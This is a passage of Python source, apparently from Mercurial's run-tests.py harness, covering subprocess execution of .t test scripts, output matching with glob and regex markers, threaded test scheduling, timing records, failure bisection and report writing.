def _runcommand(self, cmd, env, normalizenewlines=False):
"""Run command in a sub-process, capturing the output (stdout and
stderr).
Return a tuple (exitcode, output). output is None in debug mode.
"""
if self._debug:
proc = subprocess.Popen(
_bytes2sys(cmd),
shell=True,
cwd=_bytes2sys(self._testtmp),
env=env,
)
ret = proc.wait()
return (ret, None)
proc = Popen4(cmd, self._testtmp, self._timeout, env)
def cleanup():
terminate(proc)
ret = proc.wait()
if ret == 0:
ret = signal.SIGTERM << 8
killdaemons(env["DAEMON_PIDS"])
return ret
proc.tochild.close()
try:
output = proc.fromchild.read()
except KeyboardInterrupt:
vlog("# Handling keyboard interrupt")
cleanup()
raise
ret = proc.wait()
if wifexited(ret):
ret = os.WEXITSTATUS(ret)
if proc.timeout:
ret = "timeout"
if ret:
killdaemons(env["DAEMON_PIDS"])
for s, r in self._getreplacements():
output = re.sub(s, r, output)
if normalizenewlines:
output = output.replace(b"\r\n", b"\n")
return ret, output.splitlines(True)
class PythonTest(Test):
"""A Python-based test."""
@property
def refpath(self):
return os.path.join(self._testdir, b"%s.out" % self.bname)
def _run(self, env):
# Quote the python(3) executable for Windows
cmd = b'"%s" "%s"' % (PYTHON, self.path)
vlog("# Running", cmd.decode("utf-8"))
normalizenewlines = os.name == "nt"
result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
if self._aborted:
raise KeyboardInterrupt()
return result
# Some glob patterns apply only in some circumstances, so the script
# might want to remove (glob) annotations that otherwise should be
# retained.
checkcodeglobpats = [
# On Windows it looks like \ doesn't require a (glob), but we know
# better.
re.compile(br"^pushing to \$TESTTMP/.*[^)]$"),
re.compile(br"^moving \S+/.*[^)]$"),
re.compile(br"^pulling from \$TESTTMP/.*[^)]$"),
# Not all platforms have 127.0.0.1 as loopback (though most do),
# so we always glob that too.
re.compile(br".*\$LOCALIP.*$"),
]
bchr = chr
if PYTHON3:
bchr = lambda x: bytes([x])
WARN_UNDEFINED = 1
WARN_YES = 2
WARN_NO = 3
MARK_OPTIONAL = b" (?)\n"
def isoptional(line):
return line.endswith(MARK_OPTIONAL)
class TTest(Test):
"""A "t test" is a test backed by a .t file."""
SKIPPED_PREFIX = b"skipped: "
FAILED_PREFIX = b"hghave check failed: "
NEEDESCAPE = re.compile(br"[\x00-\x08\x0b-\x1f\x7f-\xff]").search
ESCAPESUB = re.compile(br"[\x00-\x08\x0b-\x1f\\\x7f-\xff]").sub
ESCAPEMAP = {bchr(i): br"\x%02x" % i for i in range(256)}
ESCAPEMAP.update({b"\\": b"\\\\", b"\r": br"\r"})
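# ESCAPEMAP turns unprintable bytes into their \xNN spelling, so (for
# example) _stringescape(b"a\x1bb") below yields b"a\\x1bb"; backslashes and
# b"\r" get the dedicated replacements added above.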
def __init__(self, path, *args, **kwds):
# accept an extra "case" parameter
case = kwds.pop("case", [])
self._case = case
self._allcases = {x for y in parsettestcases(path) for x in y}
super(TTest, self).__init__(path, *args, **kwds)
if case:
casepath = b"#".join(case)
self.name = "%s#%s" % (self.name, _bytes2sys(casepath))
self.errpath = b"%s#%s.err" % (self.errpath[:-4], casepath)
self._tmpname += b"-%s" % casepath.replace(b"#", b"-")
self._have = {}
@property
def refpath(self):
return os.path.join(self._testdir, self.bname)
def _run(self, env):
with open(self.path, "rb") as f:
lines = f.readlines()
# The .t file is both the reference output and the test input; keep the
# reference output updated with the test input. This avoids some race
# conditions where the reference output does not match the actual test.
if self._refout is not None:
self._refout = lines
salt, script, after, expected = self._parsetest(lines)
# Write out the generated script.
fname = b"%s.sh" % self._testtmp
with open(fname, "wb") as f:
for l in script:
f.write(l)
cmd = b'%s "%s"' % (self._shell, fname)
vlog("# Running", cmd.decode("utf-8"))
exitcode, output = self._runcommand(cmd, env)
if self._aborted:
raise KeyboardInterrupt()
# Do not merge output if skipped. Return hghave message instead.
# Similarly, with --debug, output is None.
if exitcode == self.SKIPPED_STATUS or output is None:
return exitcode, output
return self._processoutput(exitcode, output, salt, after, expected)
def _hghave(self, reqs):
allreqs = b" ".join(reqs)
self._detectslow(reqs)
if allreqs in self._have:
return self._have.get(allreqs)
# TODO do something smarter when all other uses of hghave are gone.
runtestdir = osenvironb[b"RUNTESTDIR"]
tdir = runtestdir.replace(b"\\", b"/")
proc = Popen4(
b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
self._testtmp,
0,
self._getenv(),
)
stdout, stderr = proc.communicate()
ret = proc.wait()
if wifexited(ret):
ret = os.WEXITSTATUS(ret)
if ret == 2:
print(stdout.decode("utf-8"))
sys.exit(1)
if ret != 0:
self._have[allreqs] = (False, stdout)
return False, stdout
self._have[allreqs] = (True, None)
return True, None
def _detectslow(self, reqs):
"""update the timeout of slow test when appropriate"""
if b"slow" in reqs:
self._timeout = self._slowtimeout
def _iftest(self, args):
# implements "#if"
reqs = []
for arg in args:
if arg.startswith(b"no-") and arg[3:] in self._allcases:
if arg[3:] in self._case:
return False
elif arg in self._allcases:
if arg not in self._case:
return False
else:
reqs.append(arg)
self._detectslow(reqs)
return self._hghave(reqs)[0]
def _parsetest(self, lines):
# We generate a shell script which outputs unique markers to line
# up script results with our source. These markers include the input
# line number and the last return code.
salt = b"SALT%d" % time.time()
def addsalt(line, inpython):
if inpython:
script.append(b"%s %d 0\n" % (salt, line))
else:
script.append(b"echo %s %d $?\n" % (salt, line))
activetrace = []
session = str(uuid.uuid4())
if PYTHON3:
session = session.encode("ascii")
hgcatapult = os.getenv("HGTESTCATAPULTSERVERPIPE") or os.getenv(
"HGCATAPULTSERVERPIPE"
)
def toggletrace(cmd=None):
if not hgcatapult or hgcatapult == os.devnull:
return
if activetrace:
script.append(
b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
% (session, activetrace[0])
)
if cmd is None:
return
if isinstance(cmd, str):
quoted = shellquote(cmd.strip())
else:
quoted = shellquote(cmd.strip().decode("utf8")).encode("utf8")
quoted = quoted.replace(b"\\", b"\\\\")
script.append(
b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n' % (session, quoted)
)
activetrace[0:] = [quoted]
script = []
# After we run the shell script, we re-unify the script output
# with non-active parts of the source, with synchronization by our
# SALT line number markers. The after table contains the non-active
# components, ordered by line number.
after = {}
# Expected shell script output.
expected = {}
pos = prepos = -1
# True or False when in a true or false conditional section
skipping = None
# We keep track of whether or not we're in a Python block so we
# can generate the surrounding doctest magic.
inpython = False
if self._debug:
script.append(b"set -x\n")
if self._hgcommand != b"hg":
script.append(b'alias hg="%s"\n' % self._hgcommand)
if os.getenv("MSYSTEM"):
script.append(b'alias pwd="pwd -W"\n')
if hgcatapult and hgcatapult != os.devnull:
if PYTHON3:
hgcatapult = hgcatapult.encode("utf8")
cataname = self.name.encode("utf8")
else:
cataname = self.name
# Kludge: use a while loop to keep the pipe from getting
# closed by our echo commands. The still-running file gets
# reaped at the end of the script, which causes the while
# loop to exit and closes the pipe. Sigh.
script.append(
b"rtendtracing() {\n"
b" echo END %(session)s %(name)s >> %(catapult)s\n"
b' rm -f "$TESTTMP/.still-running"\n'
b"}\n"
b'trap "rtendtracing" 0\n'
b'touch "$TESTTMP/.still-running"\n'
b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
b"> %(catapult)s &\n"
b"HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n"
b"echo START %(session)s %(name)s >> %(catapult)s\n"
% {
b"name": cataname,
b"session": session,
b"catapult": hgcatapult,
}
)
if self._case:
casestr = b"#".join(self._case)
if isinstance(casestr, str):
quoted = shellquote(casestr)
else:
quoted = shellquote(casestr.decode("utf8")).encode("utf8")
script.append(b"TESTCASE=%s\n" % quoted)
script.append(b"export TESTCASE\n")
n = 0
for n, l in enumerate(lines):
if not l.endswith(b"\n"):
l += b"\n"
if l.startswith(b"#require"):
lsplit = l.split()
if len(lsplit) < 2 or lsplit[0] != b"#require":
after.setdefault(pos, []).append(b" !!! invalid #require\n")
if not skipping:
haveresult, message = self._hghave(lsplit[1:])
if not haveresult:
script = [b'echo "%s"\nexit 80\n' % message]
break
after.setdefault(pos, []).append(l)
elif l.startswith(b"#if"):
lsplit = l.split()
if len(lsplit) < 2 or lsplit[0] != b"#if":
after.setdefault(pos, []).append(b" !!! invalid #if\n")
if skipping is not None:
after.setdefault(pos, []).append(b" !!! nested #if\n")
skipping = not self._iftest(lsplit[1:])
after.setdefault(pos, []).append(l)
elif l.startswith(b"#else"):
if skipping is None:
after.setdefault(pos, []).append(b" !!! missing #if\n")
skipping = not skipping
after.setdefault(pos, []).append(l)
elif l.startswith(b"#endif"):
if skipping is None:
after.setdefault(pos, []).append(b" !!! missing #if\n")
skipping = None
after.setdefault(pos, []).append(l)
elif skipping:
after.setdefault(pos, []).append(l)
elif l.startswith(b" >>> "): # python inlines
after.setdefault(pos, []).append(l)
prepos = pos
pos = n
if not inpython:
# We've just entered a Python block. Add the header.
inpython = True
addsalt(prepos, False) # Make sure we report the exit code.
script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
addsalt(n, True)
script.append(l[2:])
elif l.startswith(b" ... "): # python inlines
after.setdefault(prepos, []).append(l)
script.append(l[2:])
elif l.startswith(b" $ "): # commands
if inpython:
script.append(b"EOF\n")
inpython = False
after.setdefault(pos, []).append(l)
prepos = pos
pos = n
addsalt(n, False)
rawcmd = l[4:]
cmd = rawcmd.split()
toggletrace(rawcmd)
if len(cmd) == 2 and cmd[0] == b"cd":
rawcmd = b"cd %s || exit 1\n" % cmd[1]
script.append(rawcmd)
elif l.startswith(b" > "): # continuations
after.setdefault(prepos, []).append(l)
script.append(l[4:])
elif l.startswith(b" "): # results
# Queue up a list of expected results.
expected.setdefault(pos, []).append(l[2:])
else:
if inpython:
script.append(b"EOF\n")
inpython = False
# Non-command/result. Queue up for merged output.
after.setdefault(pos, []).append(l)
if inpython:
script.append(b"EOF\n")
if skipping is not None:
after.setdefault(pos, []).append(b" !!! missing #endif\n")
addsalt(n + 1, False)
# Need to end any current per-command trace
if activetrace:
toggletrace()
return salt, script, after, expected
def _processoutput(self, exitcode, output, salt, after, expected):
# Merge the script output back into a unified test.
warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
if exitcode != 0:
warnonly = WARN_NO
pos = -1
postout = []
for out_rawline in output:
out_line, cmd_line = out_rawline, None
if salt in out_rawline:
out_line, cmd_line = out_rawline.split(salt, 1)
pos, postout, warnonly = self._process_out_line(
out_line, pos, postout, expected, warnonly
)
pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
if pos in after:
postout += after.pop(pos)
if warnonly == WARN_YES:
exitcode = False # Set exitcode to warned.
return exitcode, postout
def _process_out_line(self, out_line, pos, postout, expected, warnonly):
while out_line:
if not out_line.endswith(b"\n"):
out_line += b" (no-eol)\n"
# Find the expected output at the current position.
els = [None]
if expected.get(pos, None):
els = expected[pos]
optional = []
for i, el in enumerate(els):
r = False
if el:
r, exact = self.linematch(el, out_line)
if isinstance(r, str):
if r == "-glob":
out_line = "".join(el.rsplit(" (glob)", 1))
r = "" # Warn only this line.
elif r == "retry":
postout.append(b" " + el)
else:
log("\ninfo, unknown linematch result: %r\n" % r)
r = False
if r:
els.pop(i)
break
if el:
if isoptional(el):
optional.append(i)
else:
m = optline.match(el)
if m:
conditions = m.group(2).split(b" ")
if not self._iftest(conditions):
optional.append(i)
if exact:
# Don't allow the line to be matched against a later
# line in the output
els.pop(i)
break
if r:
if r == "retry":
continue
# clean up any optional leftovers
for i in optional:
postout.append(b" " + els[i])
for i in reversed(optional):
del els[i]
postout.append(b" " + el)
else:
if self.NEEDESCAPE(out_line):
out_line = TTest._stringescape(
b"%s (esc)\n" % out_line.rstrip(b"\n")
)
postout.append(b" " + out_line) # Let diff deal with it.
if r != "": # If line failed.
warnonly = WARN_NO
elif warnonly == WARN_UNDEFINED:
warnonly = WARN_YES
break
else:
# clean up any optional leftovers
while expected.get(pos, None):
el = expected[pos].pop(0)
if el:
if not isoptional(el):
m = optline.match(el)
if m:
conditions = m.group(2).split(b" ")
if self._iftest(conditions):
# Don't append as optional line
continue
else:
continue
postout.append(b" " + el)
return pos, postout, warnonly
def _process_cmd_line(self, cmd_line, pos, postout, after):
"""process a "command" part of a line from unified test output"""
if cmd_line:
# Add on last return code.
ret = int(cmd_line.split()[1])
if ret != 0:
postout.append(b" [%d]\n" % ret)
if pos in after:
# Merge in non-active test bits.
postout += after.pop(pos)
pos = int(cmd_line.split()[0])
return pos, postout
@staticmethod
def rematch(el, l):
try:
# parse any flags at the beginning of the regex. Only 'i' is
# supported right now, but this should be easy to extend.
flags, el = re.match(br"^(\(\?i\))?(.*)", el).groups()[0:2]
flags = flags or b""
el = flags + b"(?:" + el + b")"
# use \Z to ensure that the regex matches to the end of the string
if os.name == "nt":
return re.match(el + br"\r?\n\Z", l)
return re.match(el + br"\n\Z", l)
except re.error:
# el is an invalid regex
return False
@staticmethod
def globmatch(el, l):
# The only supported special characters are * and ?, plus /, which also
# matches \ on Windows. Escaping of these characters is supported.
if el + b"\n" == l:
if os.altsep:
# matching on "/" is not needed for this line
for pat in checkcodeglobpats:
if pat.match(el):
return True
return b"-glob"
return True
el = el.replace(b"$LOCALIP", b"*")
i, n = 0, len(el)
res = b""
while i < n:
c = el[i : i + 1]
i += 1
if c == b"\\" and i < n and el[i : i + 1] in b"*?\\/":
res += el[i - 1 : i + 1]
i += 1
elif c == b"*":
res += b".*"
elif c == b"?":
res += b"."
elif c == b"/" and os.altsep:
res += b"[/\\\\]"
else:
res += re.escape(c)
return TTest.rematch(res, l)
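# Sketch of the translation above with an assumed input: when os.altsep is
# set, the expected fragment b"$TESTTMP/repo-*/x?y" becomes a pattern roughly
# equivalent to br"\$TESTTMP[/\\]repo\-.*[/\\]x.y", which rematch() then
# anchors to the end of the output line.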
def linematch(self, el, l):
if el == l: # perfect match (fast)
return True, True
retry = False
if isoptional(el):
retry = "retry"
el = el[: -len(MARK_OPTIONAL)] + b"\n"
else:
m = optline.match(el)
if m:
conditions = m.group(2).split(b" ")
el = m.group(1) + b"\n"
if not self._iftest(conditions):
# listed feature missing, should not match
return "retry", False
if el.endswith(b" (esc)\n"):
if PYTHON3:
el = el[:-7].decode("unicode_escape") + "\n"
el = el.encode("latin-1")
else:
el = el[:-7].decode("string-escape") + "\n"
if el == l or os.name == "nt" and el[:-1] + b"\r\n" == l:
return True, True
if el.endswith(b" (re)\n"):
return (TTest.rematch(el[:-6], l) or retry), False
if el.endswith(b" (glob)\n"):
# ignore '(glob)' added to l by 'replacements'
if l.endswith(b" (glob)\n"):
l = l[:-8] + b"\n"
return (TTest.globmatch(el[:-8], l) or retry), False
if os.altsep:
_l = l.replace(b"\\", b"/")
if el == _l or os.name == "nt" and el[:-1] + b"\r\n" == _l:
return True, True
return retry, True
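# Illustrative examples of the expected-output markers handled above, as they
# appear in a .t file (contents made up):
#   "  some text (re)\n"   -> matched as a regex via rematch()
#   "  file-* (glob)\n"    -> matched as a glob via globmatch()
#   "  \x1b[0m (esc)\n"    -> escape sequences are decoded before comparing
#   "  maybe shown (?)\n"  -> optional; a miss produces "retry" rather than
#                             a failure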
@staticmethod
def parsehghaveoutput(lines):
"""Parse hghave log lines.
Return tuple of lists (missing, failed):
* the missing/unknown features
* the features for which existence check failed"""
missing = []
failed = []
for line in lines:
if line.startswith(TTest.SKIPPED_PREFIX):
line = line.splitlines()[0]
missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
elif line.startswith(TTest.FAILED_PREFIX):
line = line.splitlines()[0]
failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
return missing, failed
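# For example (content made up), given the lines
#   b"skipped: missing feature: serve\n"
#   b"hghave check failed: sslcontext\n"
# this returns (['missing feature: serve'], ['sslcontext']).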
@staticmethod
def _escapef(m):
return TTest.ESCAPEMAP[m.group(0)]
@staticmethod
def _stringescape(s):
return TTest.ESCAPESUB(TTest._escapef, s)
iolock = threading.RLock()
firstlock = threading.RLock()
firsterror = False
class TestResult(unittest._TextTestResult):
"""Holds results when executing via unittest."""
# Don't worry too much about accessing the non-public _TextTestResult.
# It is relatively common in Python testing tools.
def __init__(self, options, *args, **kwargs):
super(TestResult, self).__init__(*args, **kwargs)
self._options = options
# unittest.TestResult didn't have skipped until 2.7. We need to
# polyfill it.
self.skipped = []
# We have a custom "ignored" result that isn't present in any Python
# unittest implementation. It is very similar to skipped. It may make
# sense to map it into skip some day.
self.ignored = []
self.times = []
self._firststarttime = None
# Data stored for the benefit of generating xunit reports.
self.successes = []
self.faildata = {}
if options.color == "auto":
self.color = pygmentspresent and self.stream.isatty()
elif options.color == "never":
self.color = False
else: # 'always', for testing purposes
self.color = pygmentspresent
def onStart(self, test):
"""Can be overriden by custom TestResult"""
def onEnd(self):
"""Can be overriden by custom TestResult"""
def addFailure(self, test, reason):
self.failures.append((test, reason))
if self._options.first:
self.stop()
else:
with iolock:
if reason == "timed out":
self.stream.write("t")
else:
if not self._options.nodiff:
self.stream.write("\n")
# Exclude the '\n' from highlighting to lex correctly
formatted = "ERROR: %s output changed\n" % test
self.stream.write(highlightmsg(formatted, self.color))
self.stream.write("!")
self.stream.flush()
def addSuccess(self, test):
with iolock:
super(TestResult, self).addSuccess(test)
self.successes.append(test)
def addError(self, test, err):
super(TestResult, self).addError(test, err)
if self._options.first:
self.stop()
# Polyfill.
def addSkip(self, test, reason):
self.skipped.append((test, reason))
with iolock:
if self.showAll:
self.stream.writeln("skipped %s" % reason)
else:
self.stream.write("s")
self.stream.flush()
def addIgnore(self, test, reason):
self.ignored.append((test, reason))
with iolock:
if self.showAll:
self.stream.writeln("ignored %s" % reason)
else:
if reason not in ("not retesting", "doesn't match keyword"):
self.stream.write("i")
else:
self.testsRun += 1
self.stream.flush()
def addOutputMismatch(self, test, ret, got, expected):
"""Record a mismatch in test output for a particular test."""
if self.shouldStop or firsterror:
# don't print; some other test case already failed and printed, so
# we're just stale and probably failed because our temp dir got
# cleaned up.
return
accepted = False
lines = []
with iolock:
if self._options.nodiff:
pass
elif self._options.view:
v = self._options.view
subprocess.call(
r'"%s" "%s" "%s"'
% (v, _bytes2sys(test.refpath), _bytes2sys(test.errpath)),
shell=True,
)
else:
servefail, lines = getdiff(expected, got, test.refpath, test.errpath)
self.stream.write("\n")
for line in lines:
line = highlightdiff(line, self.color)
if PYTHON3:
self.stream.flush()
self.stream.buffer.write(line)
self.stream.buffer.flush()
else:
self.stream.write(line)
self.stream.flush()
if servefail:
raise test.failureException(
"server failed to start (HGPORT=%s)" % test._startport
)
# handle interactive prompt without releasing iolock
if self._options.interactive:
if test.readrefout() != expected:
self.stream.write(
"Reference output has changed (run again to prompt " "changes)"
)
else:
self.stream.write("Accept this change? [y/N] ")
self.stream.flush()
answer = sys.stdin.readline().strip()
if answer.lower() in ("y", "yes"):
if test.path.endswith(b".t"):
rename(test.errpath, test.path)
else:
rename(test.errpath, b"%s.out" % test.path)
accepted = True
if not accepted:
self.faildata[test.name] = b"".join(lines)
return accepted
def startTest(self, test):
super(TestResult, self).startTest(test)
# os.times() reports the user and system CPU time spent by child
# processes along with the real elapsed time of the process.
# Its limitation is that it only works reliably on Linux/Unix and not
# on Windows, which is why we fall back to another function for
# wall-clock time calculations.
test.started_times = os.times()
# TODO use a monotonic clock once support for Python 2.7 is dropped.
test.started_time = time.time()
if self._firststarttime is None: # thread racy but irrelevant
self._firststarttime = test.started_time
def stopTest(self, test, interrupted=False):
super(TestResult, self).stopTest(test)
test.stopped_times = os.times()
stopped_time = time.time()
starttime = test.started_times
endtime = test.stopped_times
origin = self._firststarttime
self.times.append(
(
test.name,
endtime[2] - starttime[2], # user space CPU time
endtime[3] - starttime[3], # sys space CPU time
stopped_time - test.started_time, # real time
test.started_time - origin, # start date in run context
stopped_time - origin, # end date in run context
)
)
if interrupted:
with iolock:
self.stream.writeln(
"INTERRUPTED: %s (after %d seconds)"
% (test.name, self.times[-1][3])
)
def getTestResult():
"""
Returns the relevant test result
"""
if "CUSTOM_TEST_RESULT" in os.environ:
testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
return testresultmodule.TestResult
else:
return TestResult
class TestSuite(unittest.TestSuite):
"""Custom unittest TestSuite that knows how to execute Mercurial tests."""
def __init__(
self,
testdir,
jobs=1,
whitelist=None,
blacklist=None,
keywords=None,
loop=False,
runs_per_test=1,
loadtest=None,
showchannels=False,
*args,
**kwargs
):
"""Create a new instance that can run tests with a configuration.
testdir specifies the directory where tests are executed from. This
is typically the ``tests`` directory from Mercurial's source
repository.
jobs specifies the number of jobs to run concurrently. Each test
executes on its own thread. Tests actually spawn new processes, so
state mutation should not be an issue.
If there is only one job, it will use the main thread.
whitelist and blacklist denote tests that have been whitelisted and
blacklisted, respectively. These arguments don't belong in TestSuite.
Instead, whitelist and blacklist should be handled by the thing that
populates the TestSuite with tests. They are present to preserve
backwards compatible behavior which reports skipped tests as part
of the results.
keywords denotes key words that will be used to filter which tests
to execute. This arguably belongs outside of TestSuite.
loop denotes whether to loop over tests forever.
"""
super(TestSuite, self).__init__(*args, **kwargs)
self._jobs = jobs
self._whitelist = whitelist
self._blacklist = blacklist
self._keywords = keywords
self._loop = loop
self._runs_per_test = runs_per_test
self._loadtest = loadtest
self._showchannels = showchannels
def run(self, result):
# We have a number of filters that need to be applied. We do this
# here instead of inside Test because it makes the running logic for
# Test simpler.
tests = []
num_tests = [0]
for test in self._tests:
def get():
num_tests[0] += 1
if getattr(test, "should_reload", False):
return self._loadtest(test, num_tests[0])
return test
if not os.path.exists(test.path):
result.addSkip(test, "Doesn't exist")
continue
is_whitelisted = self._whitelist and (
test.relpath in self._whitelist or test.bname in self._whitelist
)
if not is_whitelisted:
is_blacklisted = self._blacklist and (
test.relpath in self._blacklist or test.bname in self._blacklist
)
if is_blacklisted:
result.addSkip(test, "blacklisted")
continue
if self._keywords:
with open(test.path, "rb") as f:
t = f.read().lower() + test.bname.lower()
ignored = False
for k in self._keywords.lower().split():
if k not in t:
result.addIgnore(test, "doesn't match keyword")
ignored = True
break
if ignored:
continue
for _ in xrange(self._runs_per_test):
tests.append(get())
runtests = list(tests)
done = queue.Queue()
running = 0
channels = [""] * self._jobs
def job(test, result):
for n, v in enumerate(channels):
if not v:
channel = n
break
else:
raise ValueError("Could not find output channel")
channels[channel] = "=" + test.name[5:].split(".")[0]
try:
test(result)
done.put(None)
except KeyboardInterrupt:
pass
except: # re-raises
done.put(("!", test, "run-test raised an error, see traceback"))
raise
finally:
try:
channels[channel] = ""
except IndexError:
pass
def stat():
count = 0
while channels:
d = "\n%03s " % count
for n, v in enumerate(channels):
if v:
d += v[0]
channels[n] = v[1:] or "."
else:
d += " "
d += " "
with iolock:
sys.stdout.write(d + " ")
sys.stdout.flush()
for x in xrange(10):
if channels:
time.sleep(0.1)
count += 1
stoppedearly = False
if self._showchannels:
statthread = threading.Thread(target=stat, name="stat")
statthread.start()
try:
while tests or running:
if not done.empty() or running == self._jobs or not tests:
try:
done.get(True, 1)
running -= 1
if result and result.shouldStop:
stoppedearly = True
break
except queue.Empty:
continue
if tests and not running == self._jobs:
test = tests.pop(0)
if self._loop:
if getattr(test, "should_reload", False):
num_tests[0] += 1
tests.append(self._loadtest(test, num_tests[0]))
else:
tests.append(test)
if self._jobs == 1:
job(test, result)
else:
t = threading.Thread(
target=job, name=test.name, args=(test, result)
)
t.start()
running += 1
# If we stop early we still need to wait on started tests to
# finish. Otherwise, there is a race between the test completing
# and the test's cleanup code running. This could result in the
# test reporting incorrect results.
if stoppedearly:
while running:
try:
done.get(True, 1)
running -= 1
except queue.Empty:
continue
except KeyboardInterrupt:
for test in runtests:
test.abort()
channels = []
return result
# Save the most recent 5 wall-clock runtimes of each test to a
# human-readable text file named .testtimes. Tests are sorted
# alphabetically, while times for each test are listed from oldest to
# newest.
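# The file format is one test per line, e.g. (values illustrative):
#   test-commit.t 1.234 1.198 1.305
#   test-status.t 0.412 0.399
# i.e. the test name followed by its most recent wall-clock times in
# seconds, oldest first.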
def loadtimes(outputdir):
times = []
try:
with open(os.path.join(outputdir, b".testtimes")) as fp:
for line in fp:
m = re.match("(.*?) ([0-9. ]+)", line)
times.append((m.group(1), [float(t) for t in m.group(2).split()]))
except IOError as err:
if err.errno != errno.ENOENT:
raise
return times
def savetimes(outputdir, result):
saved = dict(loadtimes(outputdir))
maxruns = 5
skipped = {str(t[0]) for t in result.skipped}
for tdata in result.times:
test, real = tdata[0], tdata[3]
if test not in skipped:
ts = saved.setdefault(test, [])
ts.append(real)
ts[:] = ts[-maxruns:]
fd, tmpname = tempfile.mkstemp(prefix=b".testtimes", dir=outputdir, text=True)
with os.fdopen(fd, "w") as fp:
for name, ts in sorted(saved.items()):
fp.write("%s %s\n" % (name, " ".join(["%.3f" % (t,) for t in ts])))
timepath = os.path.join(outputdir, b".testtimes")
try:
os.unlink(timepath)
except OSError:
pass
try:
os.rename(tmpname, timepath)
except OSError:
pass
class TextTestRunner(unittest.TextTestRunner):
"""Custom unittest test runner that uses appropriate settings."""
def __init__(self, runner, *args, **kwargs):
super(TextTestRunner, self).__init__(*args, **kwargs)
self._runner = runner
self._result = getTestResult()(
self._runner.options, self.stream, self.descriptions, self.verbosity
)
def listtests(self, test):
test = sorted(test, key=lambda t: t.name)
self._result.onStart(test)
for t in test:
print(t.name)
self._result.addSuccess(t)
if self._runner.options.xunit:
with open(self._runner.options.xunit, "wb") as xuf:
self._writexunit(self._result, xuf)
if self._runner.options.json:
jsonpath = os.path.join(self._runner._outputdir, b"report.json")
with open(jsonpath, "w") as fp:
self._writejson(self._result, fp)
return self._result
def run(self, test):
self._result.onStart(test)
test(self._result)
failed = len(self._result.failures)
skipped = len(self._result.skipped)
ignored = len(self._result.ignored)
with iolock:
self.stream.writeln("")
if not self._runner.options.noskips:
for test, msg in sorted(self._result.skipped, key=lambda s: s[0].name):
formatted = "Skipped %s: %s\n" % (test.name, msg)
msg = highlightmsg(formatted, self._result.color)
self.stream.write(msg)
for test, msg in sorted(self._result.failures, key=lambda f: f[0].name):
formatted = "Failed %s: %s\n" % (test.name, msg)
self.stream.write(highlightmsg(formatted, self._result.color))
for test, msg in sorted(self._result.errors, key=lambda e: e[0].name):
self.stream.writeln("Errored %s: %s" % (test.name, msg))
if self._runner.options.xunit:
with open(self._runner.options.xunit, "wb") as xuf:
self._writexunit(self._result, xuf)
if self._runner.options.json:
jsonpath = os.path.join(self._runner._outputdir, b"report.json")
with open(jsonpath, "w") as fp:
self._writejson(self._result, fp)
self._runner._checkhglib("Tested")
savetimes(self._runner._outputdir, self._result)
if failed and self._runner.options.known_good_rev:
self._bisecttests(t for t, m in self._result.failures)
self.stream.writeln(
"# Ran %d tests, %d skipped, %d failed."
% (self._result.testsRun, skipped + ignored, failed)
)
if failed:
self.stream.writeln(
"python hash seed: %s" % os.environ["PYTHONHASHSEED"]
)
if self._runner.options.time:
self.printtimes(self._result.times)
if self._runner.options.exceptions:
exceptions = aggregateexceptions(
os.path.join(self._runner._outputdir, b"exceptions")
)
self.stream.writeln("Exceptions Report:")
self.stream.writeln(
"%d total from %d frames"
% (exceptions["total"], len(exceptions["exceptioncounts"]))
)
combined = exceptions["combined"]
for key in sorted(combined, key=combined.get, reverse=True):
frame, line, exc = key
totalcount, testcount, leastcount, leasttest = combined[key]
self.stream.writeln(
"%d (%d tests)\t%s: %s (%s - %d total)"
% (
totalcount,
testcount,
frame,
exc,
leasttest,
leastcount,
)
)
self.stream.flush()
return self._result
def _bisecttests(self, tests):
bisectcmd = ["hg", "bisect"]
bisectrepo = self._runner.options.bisect_repo
if bisectrepo:
bisectcmd.extend(["-R", os.path.abspath(bisectrepo)])
def pread(args):
env = os.environ.copy()
env["HGPLAIN"] = "1"
p = subprocess.Popen(
args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
)
data = p.stdout.read()
p.wait()
return data
for test in tests:
pread(bisectcmd + ["--reset"]),
pread(bisectcmd + ["--bad", "."])
pread(bisectcmd + ["--good", self._runner.options.known_good_rev])
# TODO: we probably need to forward more options
# that alter hg's behavior inside the tests.
opts = ""
withhg = self._runner.options.with_hg
if withhg:
opts += " --with-hg=%s " % shellquote(_bytes2sys(withhg))
rtc = "%s %s %s %s" % (sysexecutable, sys.argv[0], opts, test)
data = pread(bisectcmd + ["--command", rtc])
m = re.search(
(
br"\nThe first (?P<goodbad>bad|good) revision "
br"is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n"
br"summary: +(?P<summary>[^\n]+)\n"
),
data,
(re.MULTILINE | re.DOTALL),
)
if m is None:
self.stream.writeln("Failed to identify failure point for %s" % test)
continue
dat = m.groupdict()
verb = "broken" if dat["goodbad"] == b"bad" else "fixed"
self.stream.writeln(
"%s %s by %s (%s)"
% (
test,
verb,
dat["node"].decode("ascii"),
dat["summary"].decode("utf8", "ignore"),
)
)
def printtimes(self, times):
# iolock held by run
self.stream.writeln("# Producing time report")
times.sort(key=lambda t: (t[3]))
cols = "%7.3f %7.3f %7.3f %7.3f %7.3f %s"
self.stream.writeln(
"%-7s %-7s %-7s %-7s %-7s %s"
% ("start", "end", "cuser", "csys", "real", "Test")
)
for tdata in times:
test = tdata[0]
cuser, csys, real, start, end = tdata[1:6]
self.stream.writeln(cols % (start, end, cuser, csys, real, test))
@staticmethod
def _writexunit(result, outf):
# See http://llg.cubic.org/docs/junit/ for a reference.
timesd = {t[0]: t[3] for t in result.times}
doc = minidom.Document()
s = doc.createElement("testsuite")
s.setAttribute("errors", "0") # TODO
s.setAttribute("failures", str(len(result.failures)))
s.setAttribute("name", "run-tests")
s.setAttribute("skipped", str(len(result.skipped) + len(result.ignored)))
s.setAttribute("tests", str(result.testsRun))
doc.appendChild(s)
for tc in result.successes:
t = doc.createElement("testcase")
